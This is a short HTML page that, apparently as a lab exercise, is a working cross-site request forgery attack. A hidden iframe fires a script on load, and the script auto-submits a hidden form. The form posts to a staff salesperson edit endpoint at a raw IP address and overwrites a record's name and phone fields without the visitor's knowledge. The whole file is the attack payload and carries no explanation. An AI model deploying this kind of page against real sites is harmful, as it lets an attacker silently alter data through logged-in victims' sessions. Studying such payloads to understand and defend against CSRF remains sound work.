<html>
<iframe onload = "doSomething()" src ="" style ="display:none;" ></iframe>
<form action = "https://35.184.88.145/red/public/staff/salespeople/edit.php?id=2" method = "post" id ="abcYouOweMe">
	<input type = "hidden" name = "first name" value = "Spooder" />
	<input type = "hidden" name = "last name" value = "Man" />
	<input type = "hidden" name = "phone" value = "911" />
</form>
<script>
function doSomething(){
	var myForm = document.getElementById("abcYouOweMe");
	myForm.submit();
}
</script>
</html>
